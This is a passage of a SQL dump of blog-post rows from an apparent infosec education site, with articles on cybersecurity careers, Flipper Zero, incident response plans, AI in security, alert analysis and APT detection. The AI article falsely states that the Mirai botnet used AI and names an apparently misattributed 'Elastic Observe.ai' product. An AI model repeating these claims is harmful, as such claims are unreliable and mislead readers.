make you well-rounded but also prepare you to specialize in areas like digital forensics or penetration testing.\n\n## How to Learn IT Fundamentals\n\nFortunately, there’s a wealth of resources to help you learn IT fundamentals and cybersecurity basics. Whether you prefer structured courses or hands-on practice, there’s something for everyone.\n\n### Online Platforms\n\n- **FreeCodeCamp** offers free, beginner-friendly lessons on IT basics.\n- **Udemy** has courses like [Complete Introduction to Cybersecurity](https://udemy.com/course/complete-introduction-to-cybersecurity) by Grant Collins, which covers IT and cybersecurity fundamentals for beginners.\n- **YouTube** provides in-depth tutorials from trusted sources like Google and online tech communities.\n\n### Certification Programs\n\nCertifications validate your knowledge and show employers that you’re serious about your career. Consider starting with foundational credentials like CompTIA IT Fundamentals (ITF+) or Cisco’s CCNA certification.\n\n### Community Engagement\n\nJoin online communities, attend webinars, and participate in live Q&A sessions. Groups like Cybercademy provide career advice, security projects, and support networks for professionals and students.\n\n### Hands-On Practice\n\nSet up virtual environments, like Kali Linux virtual machines, to experiment safely. Test tools and configurations to gain real-world experience.\n\nPractical projects not only enhance your technical skills but also build confidence as you apply theoretical knowledge to solve problems.\n\n## Cybersecurity Career Paths\n\nOnce you’ve mastered the basics, you’ll be ready to explore specialized roles within cybersecurity. Here are some popular career paths to consider:\n\n### Security Analyst\n\n- **Responsibilities**: Monitor and analyze security threats, respond to incidents, and implement security measures.\n- **Skills Needed**: Incident response, threat analysis, and knowledge of SIEM tools.\n\n### Network Engineer\n\n- **Responsibilities**: Design, implement, and maintain secure network architectures.\n- **Skills Needed**: Networking protocols, firewall configuration, and VPN setup.\n\n### Cybersecurity Consultant\n\n- **Responsibilities**: Assess organizational security risks, provide recommendations, and develop strategies to safeguard systems.\n- **Skills Needed**: Risk assessment, policy development, and regulatory compliance knowledge.\n\nEach role offers unique challenges and opportunities, allowing you to make a meaningful impact by defending businesses against cyber threats.\n\n## Start Building Your Cybersecurity Knowledge\n\nCybersecurity is an exciting and rewarding field, but a clear foundational knowledge is essential for success. Understanding IT fundamentals equips you with the skills and confidence needed to tackle advanced cybersecurity concepts down the line.\n\nBegin your educational journey today with resources that fit your learning style. Whether through online courses, practice projects, or community interactions, consistent learning and hands-on experience will pave the way for a successful cybersecurity career.', '', 'http://infoseclabs.io/uploads/1767565249662-511498932.jpeg', 'Person studying IT fundamentals for cybersecurity career', 1, 'published', '2026-01-04 09:19:00', '2026-01-05 01:20:50', 'Information Security', 'Start Your Cybersecurity Career: IT Essentials', 'Discover essential IT fundamentals to launch a successful cybersecurity career. Learn hardware, software, networking, and more.', 'IT fundamentals'),
(19, 'Flipper Zero: The Ultimate Starter Tool for Aspiring Cybersecurity Experts?', 'flipper-zero-the-ultimate-starter-tool-for-aspiring-cybersecurity-experts', '# Exploring Cybersecurity: Is Flipper Zero the Right Starting Point?\n\nIf you\'re venturing into the vast world of cybersecurity, you\'ve probably encountered the term \"Flipper Zero.\" This versatile device has gained popularity among ethical hackers, tech hobbyists, and security enthusiasts. With a sleek design and an adorable dolphin mascot, Flipper Zero is a portable hacking tool capable of exploring, analyzing, and interacting with various digital systems. But is it the best choice for beginners, or are there better alternatives for starting your cybersecurity journey?\n\nThis blog will guide you by exploring Flipper Zero\'s capabilities, assessing its pros and cons for beginners, and introducing alternative ways to build strong foundational skills in cybersecurity.\n\n## Is Flipper Zero a Good Starting Point for Cybersecurity?\n\nTo put it simply, Flipper Zero can be *a tool*, but it might not be *the tool* to begin your cybersecurity exploration. Let\'s break it down.\n\n### What Is Flipper Zero?\n\nFlipper Zero is a multifunctional device designed primarily for security testing and research. It leverages common communication protocols like RFID, NFC, infrared, and Bluetooth, making it useful for learning how these technologies function and exploring their vulnerabilities. With Flipper Zero, you can analyze signals, capture data packets, and even experiment with embedded hardware such as radio frequencies.\n\n### Pros of Starting with Flipper Zero\n\n- **Hands-on Insight into Various Technologies:** Flipper Zero offers real-world exposure to communication protocols such as RFID and NFC.\n- **Portable and Beginner-Friendly:** Its playful interface is unintimidating, making it a fun starting point for beginners with a tech affinity.\n- **Affordable Entry into Hardware Hacking:** Compared to high-end hardware hacking tools, Flipper Zero is relatively budget-friendly.\n- **Community Support:** The Flipper Zero community is active and ready to help new users experiment and troubleshoot.\n\n### Cons of Starting with Flipper Zero\n\n- **Limited Learning Scope for Beginners:** While it\'s great for hardware hacking, Flipper Zero doesn’t cover critical cybersecurity foundations like ethical hacking principles, network security basics, or malware analysis.\n- **Steep Learning Curve Without Context:** Without a foundational understanding of cybersecurity concepts, beginners may find the tool intimidating or struggle to use it meaningfully.\n- **Risk of Misuse:** Depending on where and how it\'s used, Flipper Zero may unintentionally steer newcomers toward ethically ambiguous practices.\n\n**Bottom Line:** While Flipper Zero is an excellent supplementary tool for intermediate users or those with technical know-how, it’s not an all-encompassing resource for beginners. You\'ll need additional learning pathways to properly establish a clear cybersecurity foundation.\n\n## What Are the Best Alternatives for Beginners?\n\nIf you’re just starting, opting for tools and platforms designed to teach foundational cybersecurity concepts might be a better path. Here are some beginner-friendly resources you can explore.\n\n### 1. Learning Platforms and Tutorials\n\n- **Hack The Box:** A platform with hands-on labs tailored for all skill levels. They offer challenges ranging from simple exercises to complex simulations.\n- **TryHackMe:** Beginner-friendly tutorials that incorporate guided instructions and hands-on challenges to get you started with ethical hacking and cybersecurity concepts.\n- **Cybrary:** A learning hub with free and paid courses on penetration testing, digital forensics, and more.\n- **Codecademy and FreeCodeCamp:** Great for learning programming languages like Python, which is crucial in cybersecurity.\n\n### 2. Open Source Tools\n\n- **Kali Linux:** One of the most popular operating systems for penetration testing and ethical hacking.\n- **Wireshark:** Essential for network analysis and learning how data moves across systems.\n- **Metasploit Framework:** A penetration testing tool perfect for learning about exploit techniques and system vulnerabilities.\n\n### 3. Beginner-Friendly Devices\n\nIf you’re interested in hardware hacking specifically, consider starting with simpler tools like Raspberry Pi or Arduino. These low-cost, flexible devices allow you to experiment with IoT (Internet of Things) security and basic electronics hacking before jumping to multi-functional tools like Flipper Zero.\n\n## Create a Structured Learning Path\n\nA thoughtful learning path will help you build a solid foundation and maintain consistent progress. Here\'s a simple roadmap to get started.\n\n### Step 1. Learn the Basics\n\nStart with free cybersecurity primers or videos on platforms like YouTube. Specifically, look into topics such as:\n\n- What is cybersecurity?\n- Understanding common threats (e.g., phishing, malware, ransomware).\n- Introduction to ethical hacking principles.\n\n### Step 2. Get Certified\n\nEarning certifications is a great way to build credentials and structure your learning. Here are beginner-friendly certifications to consider:\n\n- **CompTIA Security+:** A certification that covers network security fundamentals.\n- **Certified Ethical Hacker (CEH):** A foundational course to help you understand ethical hacking practices.\n- **Certified Information Systems Security Professional (CISSP):** For those aiming to take cybersecurity professionally.\n\n### Step 3. Choose a Specialization\n\nCybersecurity spans many fields, including network security, malware analysis, penetration testing, and cloud security. Once you\'ve learned the basics, explore various fields to find what interests you the most.\n\n### Step 4. Hands-On Practice\n\nApply your knowledge by solving challenges, participating in Capture The Flag (CTF) competitions, or completing simulations on HackerOne or Bugcrowd.\n\n## Why Hands-On Experience Matters\n\nTheory can only take you so far. Gaining practical experience will help you develop key problem-solving skills and confidence. Start small—for example, use Wireshark to monitor the security of your home network. Platforms like Hack The Box and TryHackMe are also excellent for setting up virtual labs where you can safely practice without real-world consequences.\n\n## Connect with the Cybersecurity Community\n\nOne of the most underrated tools for success? Networking. Engaging with experienced people in cybersecurity can expose you to valuable advice, job opportunities, and learning resources.\n\n### Communities to Join\n\n- **Cybersecurity Subreddits (e.g., r/AskNetsec):** Great for asking questions or discussing cybersecurity trends.\n- **LinkedIn Groups:** Connect with professionals and stay updated on industry news. \n\nEngage with these communities to enhance your learning and career prospects in cybersecurity.', '', 'http://infoseclabs.io/uploads/1767565511958-305863866.png', 'Flipper Zero device showcasing its interface and dolphin mascot', 1, 'published', '2026-01-04 17:24:00', '2026-01-05 01:25:21', 'Information Security', 'Flipper Zero: Best Beginner Tool for Cybersecurity?', 'Discover if Flipper Zero is ideal for cybersecurity beginners. Explore its pros, cons, and alternatives to start your journey.', 'Flipper Zero'),
(20, 'Why Every Organization Needs an Incident Response Plan for Cybersecurity', 'why-every-organization-needs-an-incident-response-plan-for-cybersecurity', '# What Is an Incident Response Plan (IRP) and Why Does Your Business Need One?\n\nIn today’s fast-paced digital landscape, cyber threats are becoming more advanced, and businesses can no longer afford to be reactive about cybersecurity. A single data breach or ransomware attack can bring operations to a halt, costing millions and damaging your reputation.\n\nThis is where an **Incident Response Plan (IRP)** comes in. Think of it as your organization’s cybersecurity playbook—a guide to managing and mitigating the damage caused by cyberattacks. A well-crafted IRP not only minimizes downtime but also ensures faster recovery, saving your business time, money, and stress.\n\nThis guide will explain why an IRP is essential, how it protects your business from cyber threats, and the steps to create, test, and improve it.\n\n---\n\n## Why Is an Incident Response Plan Important?\n\nWithout a solid plan in place, businesses are left scrambling to deal with cyberattacks, leading to chaos, delays, and greater financial losses. An **Incident Response Plan** is the backbone of effective cybersecurity, helping businesses stay resilient against threats. Here’s why every organization needs one:\n\n### 1. Minimize Downtime\n\nEvery second counts during a cyberattack. A strong IRP gives your team clear steps to follow, reducing system downtime and restoring operations quickly.\n\n### 2. Reduce Financial and Reputational Damage\n\nCyberattacks can result in regulatory fines, business losses, and a tarnished brand image. A swift and transparent response, guided by an IRP, can minimize these impacts.\n\n### 3. Ensure Regulatory Compliance\n\nMany industries require organizations to have an IRP as part of their cybersecurity measures. For example, companies under **GDPR**, **HIPAA**, or similar regulations must demonstrate they have plans in place to manage data breaches.\n\n### 4. Boost Customer Trust\n\nClients trust companies that can handle cyber threats effectively. A demonstrated ability to respond to incidents builds confidence and strengthens customer relationships.\n\n### 5. Reduce Stress for IT Teams\n\nCybersecurity teams face enormous pressure during an attack. An IRP eliminates the guesswork, helping them make better decisions and reducing stress.\n\n---\n\n## Components of an Effective Incident Response Plan\n\nA great IRP is more than a document—it’s a strategic guide with clear roles, processes, and actionable steps. Here are the key elements:\n\n### 1. Team Roles and Responsibilities\n\nDefine who does what during an incident. Your team may include an Incident Response Manager, IT Security Analysts, Communication Managers, and legal advisors.\n\n### 2. Incident Identification and Classification\n\nEstablish criteria for identifying incidents and their severity levels. Knowing whether a threat is minor or critical helps prioritize resources.\n\n### 3. Actionable Playbook for Threats\n\nOutline specific steps for containment, eradication, and recovery. Include backup options in case primary systems fail.\n\n### 4. Communication Protocols\n\nPlan how to share information during a crisis, both internally (IT team, executives, employees) and externally (customers, partners, regulators).\n\n### 5. Legal and Compliance Requirements\n\nDocument steps to meet legal obligations, such as notifying affected users or regulatory bodies of a data breach within the required timeline.\n\n### 6. Post-Incident Review\n\nInclude a process for reviewing incidents to identify weaknesses and improve future responses.\n\n---\n\n## How to Create an Incident Response Plan\n\nBuilding an effective IRP takes time and planning. Here are the essential steps:\n\n### Step 1. Assess Your Cybersecurity Risks\n\nIdentify your organization’s vulnerabilities. Are ransomware attacks, phishing scams, or insider threats more likely? Understanding your risks is the foundation of your plan.\n\n### Step 2. Identify Critical Assets\n\nList the most important assets to protect, such as customer data, intellectual property, or systems critical to daily operations.\n\n### Step 3. Assemble Your Incident Response Team (IRT)\n\nForm a team with defined roles, including IT staff, legal advisors, and PR experts to manage internal and external communications.\n\n### Step 4. Write a Threat Response Playbook\n\nCreate detailed steps for handling specific threats, such as ransomware, DDoS attacks, or phishing. Keep the instructions clear and easy to follow.\n\n### Step 5. Set Up Incident Documentation\n\nDevelop a system to log incidents, track how they were detected, and record steps taken to resolve them. This helps improve future responses.\n\n### Step 6. Train Employees\n\nTrain all employees—not just IT—on how to recognize and report potential threats. Cybersecurity is a team effort, and awareness is key.\n\n---\n\n## Testing and Improving Your Incident Response Plan\n\nAn IRP needs regular testing and updates to remain effective in the face of evolving cyber threats. Here’s how to keep it up to date:\n\n### 1. Simulate Real Attacks\n\nConduct mock phishing campaigns, malware simulations, or tabletop exercises to test how well your team responds.\n\n### 2. Gather Feedback\n\nAfter a test or real incident, ask your team what worked and what didn’t. Use this input to refine your plan.\n\n### 3. Update Regularly\n\nCyber threats and technologies evolve quickly. Update your IRP to include lessons learned, new tools, and regulatory changes.\n\n### 4. Track Key Metrics\n\nMonitor how long it takes to detect, contain, and recover from incidents. Set goals to improve these response times.\n\n### 5. Foster a Culture of Improvement\n\nTreat every incident and exercise as a learning opportunity. Share findings across teams to ensure everyone is informed and prepared.\n\n---\n\n## Build Resilience with a Strong Incident Response Plan\n\nA well-designed **Incident Response Plan** is essential in today’s cyber landscape. It’s not just a tool for IT teams—it’s a critical part of protecting your business, your customers, and your reputation. With an IRP, you can minimize downtime, reduce costs, and recover faster when faced with cyber threats.\n\nCybersecurity is no longer optional. Whether you’re a business owner or an IT professional, building and refining an IRP is a vital step toward long-term resilience and success. Start today to stay ahead of evolving cyber risks and protect what matters most.', '', 'http://infoseclabs.io/uploads/1767586151372-678797972.png', 'Illustration of a business team executing a cybersecurity incident response plan', 1, 'published', '2026-01-04 23:08:00', '2026-01-05 07:09:23', 'Information Security', 'Essential Cybersecurity: Incident Response Plans', 'Discover why an Incident Response Plan is crucial for protecting your business from cyber threats and minimizing damage.', 'Incident Response Plan'),
(21, 'The Impact of AI on Cybersecurity: Opportunities and Threats', 'the-impact-of-ai-on-cybersecurity-opportunities-and-threats', '# The Impact of Artificial Intelligence on Cybersecurity\n\nArtificial intelligence (AI) is transforming industries across the globe, and cybersecurity is no exception. From enhancing threat detection and response to redefining how we approach online defenses, AI has become a powerful ally. However, it has also created new threats by amplifying the capabilities of cybercriminals.\n\nThis post explores the dual nature of AI within the realm of cybersecurity. You\'ll learn about its opportunities, risks, real-world applications, and the trends shaping its future.\n\n## How AI is Revolutionizing Cybersecurity\n\nCyber threats are more sophisticated and persistent than ever. Traditional, reactive security systems often fall short in detecting and mitigating attacks quickly. Enter AI, which has proven to be a game-changer.\n\nAI in cybersecurity excels at recognizing patterns within enormous datasets, detecting abnormalities, and responding to potential threats with speed and accuracy. It paves the way for smarter, more efficient security protocols, ultimately reshaping how organizations tackle security challenges. But as with every powerful tool, AI opens doors for both defenders and attackers.\n\n### Why AI Matters in Cybersecurity\n\n- **Volume of Threats**: Cyber threats are increasing; AI helps organizations tackle this growing challenge efficiently.\n- **Real-time Responses**: AI-driven tools offer proactive rather than reactive measures.\n- **Complexity of Patterns**: Threat detection has evolved beyond detecting \"red flags.\" Machine learning (ML) algorithms recognize complex malicious behavior patterns.\n\n## Opportunities Created by AI in Cybersecurity\n\nAI brings a wealth of opportunities to cybersecurity professionals, giving defensive systems a critical edge.\n\n### Automated Threat Detection\n\nAI can analyze vast amounts of data to identify abnormal patterns in user behavior, network traffic, or application usage. This capability minimizes an organization\'s time-to-detect (TTD) and containment of cyberattacks, which is crucial in reducing damage.\n\n**Example:** AI-driven Security Information and Event Management (SIEM) platforms leverage ML to detect anomalies in real-time. Systems like Elastic\'s Observe.ai and IBM QRadar continuously improve their accuracy over time.\n\n### Enhanced Malware Detection\n\nAI’s ability to recognize nuanced patterns means it can detect and block even \"zero-day\" malware attacks. Unlike traditional systems requiring rule-based detection, AI tools analyze the behavior of files before they execute, flagging suspicious activity.\n\n### Improved Phishing Protection\n\nPhishing attacks are among the most common cyber threats, and AI plays a vital role in combating them:\n\n- AI tools scan emails for patterns and keywords associated with phishing.\n- Natural language processing (NLP) allows AI to identify tone and wording suggestive of fraudulent emails.\n\n### Faster Incident Response\n\nUsing predictive analytics, AI can suggest remediation measures more quickly than human analysts. Automated responses also reduce reliance on manpower, saving organizations time and financial resources.\n\n### Vulnerability Management\n\nAI tools like Tenable.io automate vulnerability scanning, identifying weaknesses before attackers can exploit them. AI continuously learns from data across networks, systems, and endpoints to maintain an up-to-date understanding of organizational threats.\n\n## Threats Posed by AI in Cybersecurity\n\nDespite its promise, AI has a darker side. It introduces threats that are making cybercriminals more dangerous than ever before.\n\n### AI-driven Cyberattacks\n\nAttackers are already leveraging AI to carry out highly targeted and efficient attacks:\n\n- AI is used to crack passwords faster than brute-force tools.\n- Malware is evolving, using AI capabilities to spread autonomously and adapt to anti-malware measures.\n\n### Deepfake Technology\n\nDeepfakes are AI-generated videos or audio recordings that simulate real people’s appearances or voices. This growing threat can be used for:\n\n- Impersonating executives to facilitate wire fraud (e.g., \"CEO voice scams\").\n- Creating fake videos to spread misinformation or cause reputational harm.\n\n### Exploitation of AI Systems\n\nCybercriminals are turning AI itself into a target:\n\n- They manipulate AI\'s training data to produce false positives or negatives, weakening its effectiveness.\n- Hackers exploit vulnerabilities in AI models to carry out adversarial attacks, which alter input data in a way that causes AI tools to malfunction.\n\n### Weaponization of Data\n\nAI needs massive datasets for training, but these datasets are often sensitive and retrievable. Should an attacker gain access, they can exploit or sell this stolen information.\n\n## Real-world Cases of AI in Cybersecurity\n\n### IBM’s Watson for Cybersecurity\n\nIBM Watson uses AI to analyze and interpret thousands of threat reports daily, shortening the time it takes security analysts to interpret threat intelligence and respond.\n\n**Impact:** Reduced threat analysis time and improved security postures for large organizations.\n\n### Google’s Chronicle Backstory\n\nChronicle, a cybersecurity tool by Google, uses AI to parse and correlate data across an organization’s infrastructure. This narrows down potential threats with incredible speed and accuracy.\n\n**Impact:** AI enhances internal threat hunting, detecting behavior that evades standard tools.\n\n### AI-powered Botnets\n\nUnfortunately, AI also empowers attackers. The infamous Mirai botnet used AI to infect IoT devices worldwide, leading to massive distributed denial-of-service (DDoS) attacks in 2016.\n\n**Impact:** Highlighted vulnerabilities in IoT devices while showcasing how AI can power large-scale attacks.\n\n## Future Trends in AI and Cybersecurity\n\n### Adaptive Security Systems\n\nWe foresee traditional, static security systems giving way to AI-powered adaptive systems capable of evolving to meet dynamic threats. These systems will detect, analyze, and respond based on real-time scenarios, offering a more resilient defense.\n\n### The Rise of Federated Learning\n\nFederated learning allows AI models to be trained on decentralized datasets without transferring sensitive data. This technique will enhance privacy while ensuring robust threat detection.\n\n### AI Collaboration\n\nFuture cybersecurity tools will lean on collaborative AI. For example, algorithms from multiple organizations may share anonymized data on emerging threats, creating a unified front against cyber criminals.\n\n### Regulation of AI in Cybersecurity\n\nGovernments and regulatory bodies will likely introduce stricter frameworks to govern the ethical and controlled use of AI tools. These regulations will balance innovation with security.\n\n## Strengthening Defenses with AI\n\nThe intersection of AI and cybersecurity is an exciting, high-stakes domain. While AI is a potent enabler of security advancements, it also presents new challenges that must be carefully managed. As we move forward, the collaboration between AI technologies and human expertise will be crucial in fortifying our defenses against cyber threats.', '', 'http://infoseclabs.io/uploads/1767586386191-18351172.png', 'AI-enhanced cybersecurity defense illustration', 1, 'published', '2026-01-05 15:12:00', '2026-01-06 04:37:20', 'Information Security', 'AI\'s Role in Cybersecurity: Opportunities & Threats', 'Explore how AI transforms cybersecurity, enhancing defenses and introducing new risks. Discover its dual impact and future trends.', 'AI cybersecurity'),
(22, 'Security Tool Analyst vs. Security Alerts Without Tools: Which Approach is Best?', 'security-tool-analyst-vs-security-alerts-without-tools-which-approach-is-best', '# Exploring Cybersecurity: Tools vs. Manual Analysis\n\nCybersecurity is a rapidly evolving field where protecting digital assets is critical for organizations of all sizes. With advancements in both threats and defenses, there is often debate over the best approach to security. Should we rely on technology and tools or focus on manual security alert analysis? What approach is more effective for job interviews, and do professionals really need to learn Digital Forensics and Incident Response (DFIR) manually?\n\nThis blog delves into these questions by exploring the roles of security tool analysts, examining the process of handling alerts without tools, and discussing their implications for career development and hiring. Read on to determine which approach aligns with your goals and how best to prepare for the evolving world of cybersecurity.\n\n## What is a Security Tool Analyst?\n\nSecurity tool analysts are professionals who work with software and tools specifically designed to detect, manage, and respond to security threats. Their role revolves around leveraging automated systems and platforms, such as:\n\n- SIEM (Security Information and Event Management) solutions\n- EDR (Endpoint Detection and Response) tools\n- Intrusion detection systems\n\nThese tools help analyze logs, monitor suspicious activities, and respond to security incidents efficiently.\n\n### Key Responsibilities of a Security Tool Analyst\n\n- Configuring and maintaining security tools used for threat detection.\n- Monitoring dashboards and analyzing alerts generated by security tools.\n- Investigating flagged incidents to determine their impact and severity.\n- Creating reports based on findings and providing recommendations.\n\nTools such as Splunk, QRadar, and CrowdStrike often form the backbone of their workflow, offering automation and insights critical to modern cybersecurity.\n\n### Advantages of Security Tools\n\n1. **Efficiency**: Tools automate repetitive tasks, allowing analysts to manage larger volumes of data in less time.\n2. **Accuracy**: Many tools detect intricate patterns that may be missed by manual observation, reducing the chance of human error.\n3. **Scalability**: Better suited for handling complex, large-scale networks with continuously growing traffic.\n\nHowever, reliance on tools comes with its challenges, such as overdependence and a potential gap in understanding the deeper technical mechanisms behind alerts.\n\n## Security Alerts Without Tools: A Hands-On Approach\n\nOn the other hand, some cybersecurity professionals believe in adopting manual approaches to monitoring and analyzing security alerts. This involves sifting through raw logs, network data, and endpoint activity without the use of advanced software solutions.\n\n### Challenges of Working Without Tools\n\n- **Time-Intensive**: Manually detecting, validating, and responding to alerts takes a significant amount of time.\n- **Prone to Errors**: Relying solely on human judgment can lead to mistakes, especially under time pressure.\n- **Resource-Heavy**: Requires deep expertise and consistent focus to manage alerts effectively.\n\nPractitioners argue that this approach sharpens core skills, builds a better understanding of underlying systems, and helps professionals tackle situations where they don’t have access to tools.\n\n### The Argument for Manual Security Analysis\n\nDespite its challenges, manual analysis provides a solid foundation in cybersecurity concepts. It ensures professionals can work in tool-agnostic environments and allows them to rely on expertise rather than software alone.\n\n## Security Tools vs. Manual Security Alerts\n\nWhen it comes to comparing the two approaches, several factors come into play, including efficiency, accuracy, and usability.\n\n| Factor          | Security Tool Analyst                      | Manual Security Alerts                                 |\n|-----------------|--------------------------------------------|--------------------------------------------------------|\n| **Efficiency**  | Highly efficient, especially for large-scale data. | Time-consuming and less practical for high-volume analysis. |\n| **Accuracy**    | Tools reduce human error but require proper tuning. | Deep understanding of systems minimizes false positives. |\n| **Learning Curve** | Easier to adopt with proper training.        | Requires extensive technical expertise and experience.   |\n| **Scalability** | Easily handles enterprise-level networks.   | Limited by human capacity and resources.                |\n\nIt’s clear that each method has its own strengths and weaknesses. For most organizations, the ideal approach is often a combination of both—a reliance on tools to handle efficiency and scale, paired with skilled professionals who can step in when tools fall short.\n\n## What Do Employers Look For in Interviews?\n\nIf you’re preparing for an interview as a security analyst, you may wonder which approach is more valued. The truth is, companies look for a balance between technical proficiency with tools and a foundational understanding of cybersecurity concepts.\n\n### Skills That Stand Out in Interviews\n\n- **Tool Proficiency**: Familiarity with popular platforms like Splunk, Palo Alto, or Elastic Security is almost always a plus.\n- **Problem-Solving**: Hiring managers want to see how you solve problems when tools fail or alerts are ambiguous.\n- **Foundational Knowledge**: A solid grasp of TCP/IP, intrusion detection techniques, and endpoint security matters as much as tool expertise.\n\nApplicants often gain an edge by showcasing their ability to adapt—highlighting how they’ve used tools to solve real-world challenges while demonstrating their capability to analyze security issues manually when needed.\n\n## Do Professionals Need to Learn DFIR Manually?\n\nDigital Forensics and Incident Response (DFIR) plays a critical role in addressing cybersecurity incidents. However, a common question is whether it’s essential for professionals to learn DFIR skills manually.\n\n### Pros of Learning DFIR Manually\n\n- **Deeper Insight**: Understanding the \"why\" and \"how\" behind security alerts helps identify patterns and root causes effectively.\n- **Tool Independence**: Professionals who train manually can perform investigations even without pre-configured software.\n- **Troubleshooting Complex Threats**: Manual skills ensure readiness for incidents that may crash or bypass enterprise security tools.\n\n### Cons of Manual DFIR Learning\n\n- **Time-Intensive**: Manual learning takes significant time and commitment, especially for professionals new to the field.', '', 'http://infoseclabs.io/uploads/1767838334749-937001140.jpg', 'Security analyst comparing automated tools with manual alert analysis', 1, 'published', '2026-01-07 21:12:00', '2026-01-08 05:12:23', 'Information Security', 'Security Tools vs Manual Alerts: Best Cyber Approach?', 'Explore the best cybersecurity approach: automated tools or manual alerts. Understand roles, efficiency, and career implications.', 'Cybersecurity Tools'),
(23, 'How Cybersecurity Professionals Can Detect Advanced Persistent Threats (APTs)', 'how-cybersecurity-professionals-can-detect-advanced-persistent-threats-apts', '# Advanced Persistent Threats: A Comprehensive Guide\n\nAdvanced Persistent Threats (APTs) are among the most sophisticated and potentially devastating cyber threats that organizations face today. These stealthy attackers target sensitive data, critical systems, and intellectual property, often remaining undetected for months or even years. For cybersecurity professionals, the ability to detect and remediate APTs is crucial for defending organizational assets.\n\nThis guide provides an in-depth look at how cybersecurity experts can identify APTs within their networks. We\'ll explore the APT lifecycle, proactive detection measures, effective tools, and real-world case studies, equipping you with practical strategies to stay ahead of these advanced threats.\n\n## Understanding Advanced Persistent Threats\n\n### What Are They and Why Are They Significant?\n\nAdvanced Persistent Threats are prolonged, targeted cyberattacks carried out by sophisticated adversaries, often backed by nation-states or highly organized cybercriminal groups. Unlike opportunistic attacks, APTs are meticulously planned and executed, with the primary goal of stealing sensitive information, causing financial loss, or disrupting operations.\n\nWhat distinguishes APTs from other cyber threats is their **persistence** and **stealth**. Attackers work patiently to infiltrate systems, evade detection, and maintain long-term access. This makes them particularly dangerous for organizations reliant on intellectual property, financial systems, or confidential customer data.\n\n### A Perspective on Cost and Risk\n\nAPTs are expensive—not just for attackers but for their victims. According to the Ponemon Institute, the average cost of a data breach is now $4.45 million globally, and breaches involving complex APTs often result in even higher costs.\n\nUnderstanding the significance of these threats is the first step toward detection and protection.\n\n## Decoding the APT Lifecycle\n\nTo effectively identify APTs, professionals must first understand their lifecycle. The APT lifecycle generally consists of the following stages:\n\n1. **Reconnaissance**  \n   Attackers gather information about the target organization using open-source intelligence (OSINT), web-based research, and phishing techniques.\n\n2. **Initial Intrusion**  \n   Leveraging spear-phishing emails, zero-day vulnerabilities, or poorly secured credentials, attackers establish their initial entry point.\n\n3. **Lateral Movement**  \n   Once inside the network, attackers explore internal systems, escalate privileges, and establish backdoors to ensure continued access.\n\n4. **Data Exfiltration**  \n   During this phase, attackers identify and extract valuable data, often using encrypted channels to evade detection.\n\n5. **Persistence**  \n   Attackers install additional backdoors or maintain a dormant presence, waiting for the right moment to strike again.\n\nUnderstanding this lifecycle helps security professionals predict attacker behavior and pinpoint potential entry and action points.\n\n## Proactive Measures to Detect APTs\n\n### Establish a Comprehensive Security Framework\n\nOne of the best strategies for detecting APTs is a proactive posture. Consider implementing these foundational measures:\n\n- **Network Segmentation**  \n  Limit attacker mobility by breaking your network into isolated segments. Proper segmentation minimizes the damage caused during lateral movement.\n\n- **Behavioral Analysis**  \n  Regularly analyze user and system behavior to identify unusual patterns, such as unauthorized access attempts or unexpected file transfers.\n\n- **Threat Hunting**  \n  Deploy dedicated threat-hunting teams to actively search for indicators of compromise (IoCs) in your network before automated tools do.\n\n### Prioritize Frequent Security Audits\n\nPeriodic vulnerability assessments and penetration testing help identify weak links that could facilitate an APT attack. Regularly updating software and applying patches for known vulnerabilities also decreases entry points for attackers.\n\n## Tools and Technologies for APT Detection\n\nModern cybersecurity teams must leverage advanced tools and technologies to combat APTs. Here are some of the most effective solutions available:\n\n### 1. **Endpoint Detection and Response (EDR)**\n\nEDR tools like CrowdStrike and Carbon Black provide real-time monitoring and response capabilities across endpoints, ensuring early detection of malicious activities.\n\n### 2. **Network Traffic Analysis (NTA)**\n\nSolutions such as ExtraHop and Darktrace use AI and machine learning to monitor network traffic and identify anomalies indicative of APT activity.\n\n### 3. **Security Information and Event Management (SIEM)**\n\nSIEM platforms like Splunk and IBM QRadar aggregate and analyze data from networks, devices, and applications to spot compromise indicators.\n\n### 4. **Threat Intelligence Platforms**\n\nTools like Recorded Future and ThreatQuotient provide access to actionable threat intelligence regarding the latest APT tactics, techniques, and procedures (TTPs).\n\nBy integrating these technologies, organizations can detect suspicious behaviors earlier and respond more effectively.\n\n## Incident Response and Remediation Strategies\n\n### Build a Playbook for APT Incidents\n\nEvery security team should have a detailed incident response plan tailored to APT scenarios. Key steps include:\n\n1. **Containment**  \n   Isolate affected systems to prevent lateral movement and further compromise.\n\n2. **Eradication**  \n   Remove malicious files, unauthorized accounts, and backdoors from your network.\n\n3. **Recovery**  \n   Restore systems from secure backups and monitor closely to ensure attackers don’t return.\n\n4. **Post-Incident Review**  \n   Conduct a comprehensive review of the incident to identify gaps in your defenses and improve future response efforts.\n\n### Train and Empower Your Team\n\nContinuous training ensures your cybersecurity team is well-equipped to address modern threats. Focus on simulation exercises and tabletop drills to test incident readiness.\n\n## Case Studies: Real-World Examples of APT Detection\n\nLooking at real-world scenarios can provide valuable insights into APT detection and response.\n\n### 1. **APT28 and the DNC Hack**\n\nThe Russian-backed APT28 (Fancy Bear) used spear-phishing emails to infiltrate the Democratic National Committee (DNC) systems, highlighting the importance of vigilance against such sophisticated threats.', '', 'http://infoseclabs.io/uploads/1767838642945-921379380.png', 'Cybersecurity professional analyzing network data to detect APTs', 1, 'published', '2026-01-07 13:17:00', '2026-01-08 05:19:30', 'Information Security', 'Detect Advanced Persistent Threats in Cybersecurity', 'Learn how to identify and combat Advanced Persistent Threats (APTs) to protect your organization\'s sensitive data and systems.', 'Advanced Persistent Threats');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
